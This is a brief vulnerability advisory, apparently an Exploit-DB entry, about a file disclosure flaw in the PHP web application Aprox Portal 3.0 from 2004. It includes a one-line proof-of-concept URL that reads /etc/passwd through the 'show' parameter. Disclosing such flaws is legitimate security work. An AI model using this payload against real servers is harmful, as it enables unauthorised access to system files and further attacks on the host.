Aprox Portal 3.0 - File Disclosure

EDB-ID:

23630


Author:

Zero X

Type:

webapps


Platform:

PHP

Date:

2004-01-31


source: https://www.securityfocus.com/bid/9540/info

Aprox Portal is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. These files may exist outside of the server root.

This could expose sensitive information that may be useful in further attacks against the host. 

http://www.example.com/index.php?show=/etc/passwd